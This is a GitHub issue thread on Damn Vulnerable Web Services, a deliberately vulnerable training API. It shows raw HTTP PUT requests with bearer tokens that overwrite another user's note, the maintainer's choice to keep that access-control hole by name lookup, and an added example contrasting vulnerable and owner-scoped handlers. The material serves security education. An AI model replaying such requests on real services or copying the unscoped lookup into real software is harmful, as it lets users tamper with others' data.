snoopysecurity / dvws-node

Damn Vulnerable Web Services is a vulnerable application with a web service and an API that can be used to learn about webservices/API related vulnerabilities.
GNU General Public License v3.0

Horizontal access control #32

Closed halfluke closed 2 years ago

halfluke commented 2 years ago

Hi,

could you please check the horizontal access control below? "If you know the note ID (e.g. 1-8) and the note name, it is possible to change the content of the note. As such it is possible for any user to change the note content of any user. "

It seems to me that the note id is now an alphanumeric string (non-guessable?):

PUT /api/v2/notes/62e7002d0a5aba0032093dc5 HTTP/1.1
Host: dvws.local
Content-Length: 29
Accept: application/json, text/plain, */*
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjU5MzA4NTkzLCJleHAiOjE2NTk0ODEzOTMsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.sqGkIqO6EMfEe4j_snrmNgEE_XMt9gjCQQblro5zP5A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://dvws.local
Referer: http://dvws.local/notes.html
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

{"name":"yo","body":"change"}

snoopysecurity commented 2 years ago

Hmmm I see what you mean. Indeed it was using the mongoid as a way to update and delete a note. I've made some changes, now if you know a note name, you will be able to change it as follows:

PUT /api/v2/notes/secret HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdDEiLCJwZXJtaXNzaW9ucyI6WyJ1c2VyOnJlYWQiLCJ1c2VyOndyaXRlIl0sImlhdCI6MTY1OTM5MTUxNCwiZXhwIjoxNjU5NTY0MzE0LCJpc3MiOiJodHRwczovL2dpdGh1Yi5jb20vc25vb3B5c2VjdXJpdHkifQ.fGvoYRtAbx76OimeXKl_NvYjitOFD3Paxu_K15KOUh0
Content-Type: application/json;charset=utf-8
Content-Length: 33
Origin: http://dvws.local
Connection: close
Referer: http://dvws.local/notes.html

{"name":"secret","body":"hacked"}

so secret belongs to a different user, and this will be updated. Ideally it should be the ID, but that's a little bit tedious with the current setup so I went with the note name. This change is in the latest version, thanks
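The missing check the thread is about, shown as an added example written for this page rather than code from dvws-node: an update-by-name handler with no ownership check beside one that scopes the lookup to the authenticated user. The in-memory store, the note contents and the `authUser` string (standing in for the `user` claim of the bearer JWT) are constructed assumptions; whether the note is addressed by Mongo id or by name makes no difference once the query is scoped to the caller.

```javascript
// Added example, not dvws-node's own code. Models the /api/v2/notes/:name
// update as two plain functions so it runs without Express or MongoDB.

// Constructed store: two users, one note each. `owner` is the user that created the note.
function freshStore() {
  return [
    { id: "note-1", owner: "test", name: "yo", body: "original" },
    { id: "note-2", owner: "test1", name: "secret", body: "private" },
  ];
}

// Vulnerable pattern (horizontal access control flaw): the note is located by
// name alone, so any authenticated caller can overwrite any user's note.
// `authUser` is the identity taken from the verified JWT; it is never consulted here.
function updateNoteVulnerable(store, authUser, name, body) {
  const note = store.find((n) => n.name === name);
  if (!note) return { status: 404, body: { error: "not found" } };
  note.body = body;
  return { status: 200, body: { name: note.name, body: note.body } };
}

// Hardened pattern: the lookup is scoped to the caller's own notes. A note owned
// by someone else is treated exactly like a note that does not exist (404 rather
// than 403), so the response does not reveal whether the name is taken.
function updateNoteScoped(store, authUser, name, body) {
  const note = store.find((n) => n.name === name && n.owner === authUser);
  if (!note) return { status: 404, body: { error: "not found" } };
  note.body = body;
  return { status: 200, body: { name: note.name, body: note.body } };
}

// Demonstration: user "test" tries to update "secret", which belongs to "test1".
function demo() {
  const weak = freshStore();
  const strong = freshStore();
  return {
    vulnerable: updateNoteVulnerable(weak, "test", "secret", "hacked").status, // 200, note overwritten
    scoped: updateNoteScoped(strong, "test", "secret", "hacked").status,       // 404, note untouched
    ownerStillWorks: updateNoteScoped(strong, "test1", "secret", "mine").status, // 200
  };
}
```

The same scoping belongs on the delete and read handlers too: the fix is a property of every query that takes a client-supplied identifier, not of the update route alone.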

halfluke commented 2 years ago

thanks :) Unrelated: I've noticed that with the latest commit now the note number starts from 10 instead of 0 ?

snoopysecurity commented 2 years ago

Hmmm are you sure @halfluke? maybe the mongodb you are using is from a previous dvws session you had

halfluke commented 2 years ago

true, I have recreated everything from scratch and now the very first note is number 0